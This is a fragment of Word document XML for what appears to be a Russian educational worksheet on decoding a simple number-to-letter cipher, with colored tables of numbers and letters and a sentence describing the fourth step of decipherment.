            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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21</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gridSpan w:val="4"/>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38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21</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400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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33</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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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80" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="180"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="228"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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228" w:lineRule="exac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31</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228" w:lineRule="exac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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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14</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6</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300" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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7</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FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="20"/>
              <w:jc w:val="right"/>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400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:righ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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="20"/>
              <w:jc w:val="righ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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="8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8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420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="80"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="220" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>32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16</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32</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27</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23</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26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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25</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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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8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14</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400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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22</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2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280" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="180"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>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11</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16</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21</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4</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3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="70"/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="70"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>26</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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22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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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bl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="207" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="271" w:lineRule="auto"/>
        <w:ind w:left="2" w:right="660" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Четвертый шаг дешифровки – переход от отдельных элементов (букв, слов) к их системе, устанавливая общий смысл сообщения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="2" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="240"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="260"/>
        <w:gridCol w:w="220"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="360"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="280"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="120"/>
        <w:gridCol w:w="20"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="40"/>
        <w:gridCol w:w="20"/>
        <w:gridCol w:w="20"/>
        <w:gridCol w:w="20"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="280"/>
        <w:gridCol w:w="260"/>
        <w:gridCol w:w="360"/>
        <w:gridCol w:w="80"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="420"/>
        <w:gridCol w:w="140"/>
        <w:gridCol w:w="240"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="160"/>
        <w:gridCol w:w="40"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="40"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="40"/>
      </w:tblGrid>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color w:val="FFFF00"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
              </w:rPr>
              <w:t>С</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>Е</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
              </w:rPr>
              <w:t>Г  О</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="220" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
              </w:rPr>
              <w:t>Д</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color w:val="FFFF00"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
              </w:rPr>
              <w:t>Н</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color w:val="FFFF00"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
              </w:rPr>
              <w:t>Я</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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left="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="86"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="86"/>
              </w:rPr>
              <w:t>Д</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color w:val="FFFF00"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
              </w:rPr>
              <w:t>Л</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="160"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="72"/>
                <w:sz w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="72"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Я</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30</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10</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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>4</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2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16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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="160"/>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FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>С</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="81"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="81"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>Ч</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>А</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>С</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="220" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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Т</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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Л</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>И</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В</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>О</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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Г</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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О</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shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
